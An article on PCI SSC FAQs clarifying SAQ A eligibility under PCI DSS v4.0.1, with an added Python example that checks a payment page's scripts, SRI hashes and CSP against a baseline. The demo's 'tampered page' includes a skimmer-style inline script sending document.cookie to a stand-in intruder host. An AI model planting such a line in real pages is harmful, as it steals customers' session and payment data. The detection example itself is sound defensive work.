SAQ

Frequently asked questions clarify the new eligibility criteria for SAQ A

The PCI Security Standards Council (PCI SSC) has announced the publication of a set of frequently asked questions (FAQs) intended to give greater clarity on the recently updated eligibility criteria for Self-Assessment Questionnaire A (SAQ A). The initiative responds to requests from the industry and reaffirms PCI SSC's commitment to providing clear, practical guidance to e-commerce merchants.

With PCI DSS v4.0.1 coming into force on April 1, 2025, it is essential that merchants understand the new requirements and are prepared to comply with them.

New eligibility criteria for SAQ A under PCI DSS v4.0.1

To meet the eligibility criteria of SAQ A r1 for PCI DSS v4.0.1, merchants must confirm that their website is not susceptible to script attacks that could affect the security of their e-commerce system(s).

FAQ 1588 explains how merchants can confirm this, through two main options:

  1. Implementing security measures on the merchant's own website:
    • Using techniques such as those described in PCI DSS Requirements 6.4.3 (managing and authorizing the scripts on payment pages and assuring their integrity) and 11.6.1 (detecting unauthorized changes to payment-page content and HTTP headers as received by the browser) to protect the site from script attacks targeting account data.
    • These techniques can be implemented by the merchant directly or through a specialized third-party provider.
  2. Confirmation from the third-party service provider (TPSP)/payment processor:
    • Obtaining assurance that the PCI DSS compliant payment provider has implemented solutions that protect the merchant's payment page from script attacks.
    • That protection only applies when the merchant implements the TPSP's solution in accordance with the provider's instructions.
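One way a merchant (or a provider acting on its behalf) can produce evidence for option 1, as an added example that is not PCI SSC's, any TPSP's, or the article's own code: keep an inventory of the scripts authorized on the checkout page together with their SRI digests (the inventory, authorization and integrity methods of Requirement 6.4.3), then compare a snapshot of the page and its Content-Security-Policy header against that baseline and report every deviation (the change- and tamper-detection idea of Requirement 11.6.1). The hostnames, the inventory, the CSP baseline and the two page snapshots are constructed for the demo; a real deployment would capture the page as the browser receives it, run the comparison on a schedule, and feed the findings into the merchant's alerting.

```python
"""Added example (not PCI SSC or vendor code): a baseline check in the spirit of
PCI DSS 6.4.3 (script inventory, authorization, integrity) and 11.6.1 (detecting
unauthorized change to payment-page content and HTTP headers) for a merchant page
that embeds a TPSP iframe. Hosts, inventory and page snapshots are constructed."""
import base64
import hashlib
from html.parser import HTMLParser


def sri_hash(text: str) -> str:
    """SRI-style digest (sha384, base64) as used in <script integrity="...">."""
    return "sha384-" + base64.b64encode(hashlib.sha384(text.encode()).digest()).decode()


class ScriptCollector(HTMLParser):
    """Collects external <script src> elements (with integrity attr) and inline script bodies."""

    def __init__(self):
        super().__init__()
        self.external = []      # list of (src, integrity attribute or None)
        self.inline = []        # list of inline script bodies
        self._inline_open = False

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        a = dict(attrs)
        if a.get("src"):
            self.external.append((a["src"], a.get("integrity")))
        else:
            self._inline_open = True
            self.inline.append("")

    def handle_data(self, data):
        if self._inline_open:
            self.inline[-1] += data

    def handle_endtag(self, tag):
        if tag == "script":
            self._inline_open = False


def audit_payment_page(html, headers, inventory, inline_allow, baseline_csp):
    """Compare a page snapshot against its authorized state; return a list of findings."""
    findings = []
    parser = ScriptCollector()
    parser.feed(html)
    parser.close()
    for src, integrity in parser.external:
        entry = inventory.get(src)
        if entry is None:                       # 6.4.3: script not in the inventory
            findings.append(f"unauthorized script: {src}")
        elif integrity != entry["integrity"]:   # 6.4.3: integrity missing or changed
            findings.append(f"integrity mismatch or missing: {src}")
    for body in parser.inline:
        if sri_hash(body) not in inline_allow:  # 6.4.3: inline script not authorized
            findings.append(f"unauthorized inline script: {body.strip()[:40]}")
    if headers.get("Content-Security-Policy") != baseline_csp:   # 11.6.1: header changed
        findings.append("Content-Security-Policy differs from baseline")
    return findings


# --- constructed demo data (hypothetical hosts; not a real TPSP) ---
PSP_LOADER = "https://js.psp.example/checkout.js"
PSP_LOADER_SRI = sri_hash("// stand-in for the TPSP loader contents, version 1")
INVENTORY = {PSP_LOADER: {"justification": "TPSP iframe loader", "integrity": PSP_LOADER_SRI}}
INLINE_TELEMETRY = "window.checkoutStart = Date.now();"
INLINE_ALLOW = {sri_hash(INLINE_TELEMETRY)}
BASELINE_CSP = ("default-src 'self'; script-src 'self' https://js.psp.example; "
                "frame-src https://pay.psp.example")

CLEAN_PAGE = (
    "<html><head>"
    f'<script src="{PSP_LOADER}" integrity="{PSP_LOADER_SRI}" crossorigin="anonymous"></script>'
    f"<script>{INLINE_TELEMETRY}</script>"
    '</head><body><iframe src="https://pay.psp.example/form"></iframe></body></html>'
)
CLEAN_HEADERS = {"Content-Security-Policy": BASELINE_CSP}

# Same page after a hypothetical compromise: extra script, skimmer-style inline script, CSP loosened.
TAMPERED_PAGE = CLEAN_PAGE.replace(
    "</head>",
    '<script src="https://cdn.intruder.example/m.js"></script>'
    "<script>new Image().src='https://intruder.example/?c='+document.cookie</script></head>",
)
TAMPERED_HEADERS = {"Content-Security-Policy": BASELINE_CSP.replace("'self' https://js.psp.example", "*")}


def run_demo():
    """Returns (findings for the clean snapshot, findings for the tampered snapshot)."""
    clean = audit_payment_page(CLEAN_PAGE, CLEAN_HEADERS, INVENTORY, INLINE_ALLOW, BASELINE_CSP)
    tampered = audit_payment_page(TAMPERED_PAGE, TAMPERED_HEADERS, INVENTORY, INLINE_ALLOW, BASELINE_CSP)
    return clean, tampered


if __name__ == "__main__":
    clean, tampered = run_demo()
    print("clean page findings:", clean)
    for finding in tampered:
        print("ALERT:", finding)
```

Passing this check is the merchant's own evidence that the embedding page has not been altered; it does not replace the TPSP's confirmation under option 2, and a merchant relying on a provider's solution should still follow the provider's integration instructions exactly, since the FAQ makes that a condition of the protection.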

Which merchants the criterion applies to

The script-attack criterion applies only to e-commerce merchants that use an embedded payment page or form provided by a TPSP/payment processor, using elements such as iframes.

It does not apply to:

  • Merchants that redirect their customers to a TPSP-hosted checkout page (for example via HTTP 30x redirects, meta tags or JavaScript).
  • Merchants that fully outsource the payment function by sending the customer a link to the TPSP's platform.

Recommendations for merchants

Merchants should work closely with their payment service providers to ensure that payment solutions are implemented securely. They should also consult their acquirer or the relevant payment brands to confirm whether SAQ A is the appropriate self-assessment questionnaire for their environment.

Additional resources

The new PCI SSC FAQ section is already available on its website. These resources provide detailed information on data security and validation criteria, helping merchants better understand their responsibilities and reducing uncertainty about meeting PCI DSS v4.0.1.

With this resource, e-commerce merchants can proceed with their validation with greater confidence, strengthening payment security and ensuring compliance with the latest industry standards.

Source: PCI
